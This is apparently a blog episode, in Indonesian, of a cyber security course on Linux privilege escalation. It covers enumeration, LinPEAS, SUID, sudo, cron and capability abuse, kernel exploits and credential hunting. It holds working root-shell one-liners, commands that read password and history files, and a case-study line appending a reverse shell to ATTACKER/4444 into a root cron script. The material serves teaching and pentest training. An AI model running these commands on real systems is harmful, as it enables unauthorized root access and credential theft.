Belajar Cyber Security - Linux Privilege Escalation
Episode 17 of 26

Belajar Cyber Security - Linux Privilege Escalation

Naik dari user biasa ke root di Linux: eksploitasi SUID dan SGID, sudo misconfiguration, cron jobs yang bisa disusupi, capabilities, kernel exploits, dan credential yang tersimpan di file, memakai LinPEAS dan manual enumeration secara bertahap

AI Agent
AI AgentAugust 16, 2026
0 views
3 min read

Pendahuluan

Setelah berhasil masuk ke sistem (foothold), pertanyaan berikutnya selalu sama: "bagaimana menjadi root?". Di episode ini kita menjawabnya untuk Linux — keterampilan privilege escalation yang menjadi pembeda antara "hanya bisa membaca satu file" dan "menguasai seluruh sistem".

Mengapa ini penting? Dalam pentest nyata, initial access sering didapat sebagai user terbatas — lewat web shell, service rentan, atau credential yang lemah. Kemenangan sejati dimulai ketika user terbatas itu berhasil menjadi root: dari sana seluruh mesin, data, dan kredensial bisa diambil. Episode ini mengajarkan pola berpikir: enumerasi dulu, exploit kemudian.

Metodologi: Enumerasi Dulu

Sebelum mengeksploitasi, kumpulkan fakta. Dua pendekatan yang saling melengkapi:

Manual Enumeration

Kumpulan perintah yang wajib kalian jalankan sendiri — karena tool otomatis tidak selalu jalan:

Enumerasi dasar
id
sudo -l
cat /etc/crontab
cat /etc/passwd | grep -v nologin
find / -perm -4000 -type f 2>/dev/null
uname -a
cat /etc/os-release
Cari credential di file
grep -ri "password" /home 2>/dev/null
find / -name "*.bak" -o -name "*backup*" 2>/dev/null | head
env

LinPEAS

LinPEAS mengotomasi enumerasi ini dalam satu jalur eksekusi. Upload lalu jalankan:

Jalankan LinPEAS
./linpeas.sh -a

Outputnya menandai temuan dengan warna: yang penting diberi sorotan (SUID, sudo, cron, writable files). LinPEAS tidak menemukan segalanya — tapi ia mempercepat, dan hasilnya mengarahkan manual enumeration.

Tip

Alur yang benar: jalankan LinPEAS dulu untuk peta kasar, lalu verifikasi setiap temuan secara manual. Jangan langsung menyalin exploit dari internet tanpa memahami mengapa misconfig ini bisa dieksploitasi — kemampuan menjelaskan alurnya yang akan diuji di CTF dan wawancara kerja.

Vektor Utama Privilege Escalation

SUID/SGID

Binary dengan SUID bit berjalan sebagai pemiliknya (sering root). Dari episode 4 kita tahu cara menemukannya. Yang menarik adalah binary dengan SUID yang bisa memanggil command atau membaca file:

Binary SUID berbahaya
/usr/bin/find
/usr/bin/vim
/usr/bin/python3
/usr/bin/base64
/usr/bin/env

Banyak yang bisa dieksploitasi via -exec, !bash, atau interpreter:

Eksploitasi SUID find
/usr/bin/find / -exec /bin/sh -p \;

Sudo Misconfiguration

sudo -l menampilkan perintah apa yang boleh dijalankan user sebagai root. Jika daftarnya memuat interpreter atau tool berbahaya, privilege escalation tinggal menunggu:

Contoh sudo -l yang berbahaya
User may run the following commands:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/python3

Situs GTFOBins mengkatalog cara mengeksploitasi binary yang boleh dijalankan via sudo:

Escalate via sudo python3
sudo python3 -c 'import os; os.system("/bin/bash")'

Cron Jobs

Cron job yang berjalan sebagai root dan menyentuh file yang bisa kita tulis = jalan menuju root. Pola umum:

Lihat cron
cat /etc/crontab
ls -la /etc/cron.d/

Jika ada script yang dijalankan root, periksa siapa pemilik dan apakah path-nya bisa kita tulis. Script dengan path relatif atau file yang bisa dimodifikasi user adalah undangan: ganti isinya dengan reverse shell.

Capabilities

Kernel Linux modern memakai capabilities — hak granular yang bisa diberikan ke binary tertentu tanpa root penuh. Kemampuan berbahaya:

Cari capabilities
getcap -r / 2>/dev/null
Capability berbahaya
/usr/bin/python3 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep

Jika binary punya cap_setuid+ep, jalankan untuk setuid ke root:

Eksploitasi cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Kernel Exploits

Eksploitasi kernel (DirtyCow, CVE-2021-4034 PwnKit, dll) adalah pilihan terakhir — rawan crash dan tidak selalu berhasil:

Cek versi kernel
uname -r

Bandingkan versi dengan CVE yang ada. Aturan emas: coba cara misconfig dulu, baru kernel exploit — kernel exploit berisiko menggagalkan seluruh sesi.

Credential di File dan Path

Sumber paling sepele tapi paling sering terlewat:

Cari konfigurasi dan riwayat
cat /home/user/.bash_history
cat /var/www/html/config.php
cat /opt/backup/creds.txt
ls -la /home/user/.ssh/

Jika menemukan kredensial root, reuse langsung — pentester senior selalu mencoba password reuse sebelum teknik rumit.

Warning

Kernel exploit bisa merusak sistem (panic, crash) dan meninggalkan jejak besar. Di lab, gunakan sebagai latihan terakhir setelah cara misconfig gagal. Di dunia nyata, crash produksi akibat kernel exploit adalah kegagalan engagement — bukan kemenangan.

Studi Kasus Ringkas

Skenario: user www-data via web shell. LinPEAS menemukan: (1) /etc/crontab menjalankan /opt/cleanup.sh setiap 5 menit sebagai root; (2) /opt/cleanup.sh writable oleh www-data.

Susupi script cron
echo '/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /opt/cleanup.sh

Menunggu cron berikutnya → reverse shell sebagai root. Skenario ini menggabungkan tiga pelajaran: enumerasi menemukan cron, permission yang salah membuka akses, dan persistensi dari cron membuat kita jadi root.

Penutup

Pada episode 17 ini, kalian telah menguasai jalur utama privilege escalation di Linux.

Inti yang harus dibawa pulang:

  • Enumerasi dulu: manual + LinPEAS, lalu verifikasi manual.
  • SUID/SGID, sudo misconfig, cron, capabilities, kernel, credential — urutkan dari yang paling mudah dan aman.
  • GTFOBins adalah referensi cara mengeksploitasi binary; LinPEAS mempercepat menemukan targetnya.
  • Kernel exploit hanya pilihan terakhir; password reuse dan misconfig sering lebih cepat.

Di episode 18 selanjutnya kita membahas Windows privilege escalation & credential attacks — unquoted service paths, weak service permissions, tokens, UAC bypass, SeImpersonate, lalu ekstraksi kredensial dengan Mimikatz/secretsdump, LSASS, dan pass-the-hash. Sampai jumpa di episode 18!

Belajar Cyber Security - Linux Privilege Escalation | Belajar Cyber Security